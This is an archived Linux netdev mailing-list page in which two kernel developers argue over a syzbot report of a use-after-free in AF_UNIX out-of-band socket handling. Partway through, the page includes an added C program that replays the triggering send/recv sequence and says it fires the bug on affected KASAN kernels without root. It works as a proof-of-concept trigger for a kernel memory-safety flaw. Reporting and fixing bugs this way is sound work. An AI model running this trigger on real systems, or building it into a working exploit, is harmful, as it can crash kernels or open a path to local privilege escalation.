netdev.vger.kernel.org archive mirror
From: Kuniyuki Iwashima <kuniyu@amazon.com>
To: <rao.shoaib@oracle.com>
Cc: <davem@davemloft.net>, <edumazet@google.com>, <kuba@kernel.org>,
	<kuniyu@amazon.com>, <linux-kernel@vger.kernel.org>,
	<netdev@vger.kernel.org>, <pabeni@redhat.com>,
	<syzbot+8811381d455e3e9ec788@syzkaller.appspotmail.com>,
	<syzkaller-bugs@googlegroups.com>
Subject: Re: [syzbot] [net?] KASAN: slab-use-after-free Read in unix_stream_read_actor (2)
Date: Tue, 10 Sep 2024 17:16:58 -0700	[thread overview]
Message-ID: <20240911001658.27733-1-kuniyu@amazon.com> (raw)
In-Reply-To: <1b494cee-560c-48f0-99d7-60561c91b4f1@oracle.com>

From: Shoaib Rao <rao.shoaib@oracle.com>
Date: Tue, 10 Sep 2024 16:42:33 -0700
> On 9/10/2024 3:59 PM, Kuniyuki Iwashima wrote:
> > From: Shoaib Rao <rao.shoaib@oracle.com>
> > Date: Tue, 10 Sep 2024 15:30:08 -0700
> >> My fellow engineer let's first take a breath and calm down. We both are
> >> trying to do the right thing. Now read my comments below and if I still
> >> don't get it, please be patient, maybe I am not as smart as you are.
> >>
> >> On 9/10/2024 2:53 PM, Kuniyuki Iwashima wrote:
> >>> From: Shoaib Rao <rao.shoaib@oracle.com>
> >>> Date: Tue, 10 Sep 2024 13:57:04 -0700
> >>>> The commit Message:
> >>>>
> >>>> syzbot reported use-after-free in unix_stream_recv_urg(). [0]
> >>>>
> >>>> The scenario is
> >>>>
> >>>>      1. send(MSG_OOB)
> >>>>      2. recv(MSG_OOB)
> >>>>         -> The consumed OOB remains in recv queue
> >>>>      3. send(MSG_OOB)
> >>>>      4. recv()
> >>>>         -> manage_oob() returns the next skb of the consumed OOB
> >>>>         -> This is also OOB, but unix_sk(sk)->oob_skb is not cleared
> >>>>      5. recv(MSG_OOB)
> >>>>         -> unix_sk(sk)->oob_skb is used but already freed
> >>>
> >>> How did you miss this ?
> >>>
> >>> Again, please read my patch and mails **carefully**.
> >>>
> >>> unix_sk(sk)->oob_skb wasn't cleared properly and illegal access happens
> >>> in unix_stream_recv_urg(), where ->oob_skb is dereferenced.
> >>>
> >>> Here's _technical_ thing that you want.
> >>
> >> This is exactly what I am trying to point out to you.
> >> The skb has proper references and is NOT de-referenced because
> >> __skb_datagram_iter() detects that the length is zero and returns EFAULT.
> > 
> > It's dereferenced as UNIXCB(skb).consumed first in
> > unix_stream_read_actor().
> > 
> 
> That does not matter as the skb still has a reference. That is why I
> asked you to print the reference count.

It does matter.  Please read carefully again...


> > Then, 1 byte of data is copied without -EFAULT because
> > unix_stream_recv_urg() always passes 1 as chunk (size) to
> > recv_actor().
> 
> Can you verify this because IIRC it is not de-referenced. AFAIK, KASAN
> does nothing that would cause returning EFAULT and if KASAN does spot
> this illegal access why is it not panicking the system or producing a report.
> 
> This is where we disagree.

The returned value from recv_actor() was exactly 1 when KASAN was off.
It was -EFAULT only when KASAN was on.

Anyway, -EFAULT is not that important and I'm not so interested in how
KASAN triggers that.  What's important is the fact that the first UAF
is UNIXCB() and the bug happens before that.

[...]
> > Note this is on top of net-next where no additional refcnt is taken
> > for OOB

Also in my patch:

  The recent commit 8594d9b85c07 ("af_unix: Don't call skb_get() for OOB
  skb.") uncovered the issue.
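
The five-step sequence in the quoted commit message, replayed over an AF_UNIX socketpair as an added example for this page (constructed here; it is neither syzbot's reproducer nor code posted in the thread). The struct and function names are assumptions of mine, and MSG_DONTWAIT is added to every recv so a step with nothing to read returns EAGAIN instead of blocking. Steps 1 to 3 behave the same on any kernel that accepts MSG_OOB on AF_UNIX; what steps 4 and 5 return depends on whether the kernel carries the fix, so the program only prints them. On a KASAN build of the affected net-next range, step 5 is where the reported slab-use-after-free should show up; on a patched kernel it returns the pending OOB byte or fails with EINVAL when none is pending.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>

/* Added example, not code from the thread: replay the five-step
 * send/recv sequence from the commit message over an AF_UNIX
 * socketpair. The names below (oob_trace, run_oob_sequence, ...)
 * are my own, not kernel or syzbot identifiers. */

#define OOB_STEPS 5

/* Per-step record: the syscall's return value (-errno on failure)
 * and, for recv steps, the byte that came back. */
struct oob_trace {
	const char *name[OOB_STEPS];
	int ret[OOB_STEPS];
	char byte[OOB_STEPS];
};

static int do_send(int fd, char c, int flags)
{
	ssize_t n = send(fd, &c, 1, flags);

	return n < 0 ? -errno : (int)n;
}

/* MSG_DONTWAIT is added so a step with nothing to read returns
 * -EAGAIN instead of blocking. */
static int do_recv(int fd, char *out, int flags)
{
	ssize_t n;

	*out = '\0';
	n = recv(fd, out, 1, flags | MSG_DONTWAIT);
	return n < 0 ? -errno : (int)n;
}

/*
 * Returns -1 if socketpair() fails, 0 if the kernel rejects MSG_OOB on
 * AF_UNIX at step 1 (e.g. CONFIG_AF_UNIX_OOB=n or a pre-5.15 kernel),
 * and 1 once all five steps have been issued. Results are left in *t.
 */
int run_oob_sequence(struct oob_trace *t)
{
	int fds[2], tx, rx, rc = 1;

	memset(t, 0, sizeof(*t));
	t->name[0] = "send(MSG_OOB) 'a'";
	t->name[1] = "recv(MSG_OOB)";
	t->name[2] = "send(MSG_OOB) 'b'";
	t->name[3] = "recv()";
	t->name[4] = "recv(MSG_OOB)";

	if (socketpair(AF_UNIX, SOCK_STREAM, 0, fds) < 0)
		return -1;
	tx = fds[0];
	rx = fds[1];

	/* 1. send(MSG_OOB): 'a' becomes the receiver's oob_skb. */
	t->ret[0] = do_send(tx, 'a', MSG_OOB);
	if (t->ret[0] < 0) {
		rc = 0;
		goto out;
	}
	/* 2. recv(MSG_OOB): consumes 'a'; the consumed skb stays queued. */
	t->ret[1] = do_recv(rx, &t->byte[1], MSG_OOB);
	/* 3. send(MSG_OOB): 'b' is queued right behind the consumed skb. */
	t->ret[2] = do_send(tx, 'b', MSG_OOB);
	/* 4. plain recv(): manage_oob() walks past the consumed skb; on the
	 *    affected tree it handed back 'b' without clearing oob_skb. */
	t->ret[3] = do_recv(rx, &t->byte[3], 0);
	/* 5. recv(MSG_OOB): where the reported use-after-free fired. On a
	 *    patched kernel this returns the pending OOB byte, or -EINVAL
	 *    if none is pending. */
	t->ret[4] = do_recv(rx, &t->byte[4], MSG_OOB);
out:
	close(tx);
	close(rx);
	return rc;
}

/* Steps 1-3 do not depend on the fix: both OOB sends accept their
 * byte and the first recv(MSG_OOB) returns 'a'. */
int oob_trace_prefix_ok(const struct oob_trace *t)
{
	return t->ret[0] == 1 && t->ret[1] == 1 && t->byte[1] == 'a' &&
	       t->ret[2] == 1;
}

int main(void)
{
	struct oob_trace t;
	int rc = run_oob_sequence(&t);
	int i;

	if (rc < 0) {
		perror("socketpair");
		return 1;
	}
	if (rc == 0) {
		printf("MSG_OOB on AF_UNIX unsupported here: %s\n",
		       strerror(-t.ret[0]));
		return 0;
	}
	for (i = 0; i < OOB_STEPS; i++) {
		if (t.ret[i] < 0)
			printf("%d. %-18s -> %s\n", i + 1, t.name[i],
			       strerror(-t.ret[i]));
		else if (t.byte[i])
			printf("%d. %-18s -> %d byte '%c'\n", i + 1,
			       t.name[i], t.ret[i], t.byte[i]);
		else
			printf("%d. %-18s -> %d\n", i + 1, t.name[i],
			       t.ret[i]);
	}
	return 0;
}
```

Build with `cc -Wall oob_seq.c -o oob_seq` and run it as an unprivileged user; nothing here needs root. Watch dmesg while running it on a KASAN kernel: the program itself cannot observe the use-after-free, since, as the message above notes, the first illegal access is the UNIXCB(skb).consumed read inside the kernel, and whether the copy then returns 1 or -EFAULT is incidental.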

Thread overview: 36+ messages
2024-09-04 15:13 [syzbot] [net?] KASAN: slab-use-after-free Read in unix_stream_read_actor (2) syzbot
2024-09-04 15:32 ` Eric Dumazet
2024-09-04 17:32   ` Shoaib Rao
2024-09-05  7:35     ` Shoaib Rao
2024-09-05  8:04       ` Eric Dumazet
2024-09-05 19:06         ` Shoaib Rao
2024-09-05 19:46       ` Kuniyuki Iwashima
2024-09-05 20:15         ` Shoaib Rao
2024-09-05 20:35           ` Kuniyuki Iwashima
2024-09-05 20:48             ` Shoaib Rao
2024-09-05 21:03               ` Kuniyuki Iwashima
2024-09-06 12:37               ` Eric Dumazet
2024-09-06 16:48                 ` Shoaib Rao
2024-09-07  5:06                   ` Shoaib Rao
2024-09-07  5:39                     ` Kuniyuki Iwashima
2024-09-10  0:29                     ` Shoaib Rao
2024-09-10  0:48                       ` Kuniyuki Iwashima
2024-09-10 16:55                         ` Shoaib Rao
2024-09-10 17:57                           ` Kuniyuki Iwashima
2024-09-10 18:16                             ` Shoaib Rao
2024-09-10 18:33                               ` Kuniyuki Iwashima
2024-09-10 18:49                                 ` Shoaib Rao
2024-09-10 19:49                                   ` Kuniyuki Iwashima
2024-09-10 20:57                                     ` Shoaib Rao
2024-09-10 21:53                                       ` Kuniyuki Iwashima
2024-09-10 22:30                                         ` Shoaib Rao
2024-09-10 22:59                                           ` Kuniyuki Iwashima
2024-09-10 23:42                                             ` Shoaib Rao
2024-09-11  0:16                                               ` Kuniyuki Iwashima [this message]
2024-09-05 20:37           ` Shoaib Rao
2024-09-05 20:41             ` Shoaib Rao
2024-09-05 20:42             ` Kuniyuki Iwashima
2024-09-05  5:25 ` Lizhi Xu
2024-09-05  5:57   ` syzbot
2024-09-05  6:59   ` Kuniyuki Iwashima
2024-09-05  7:46     ` syzbot
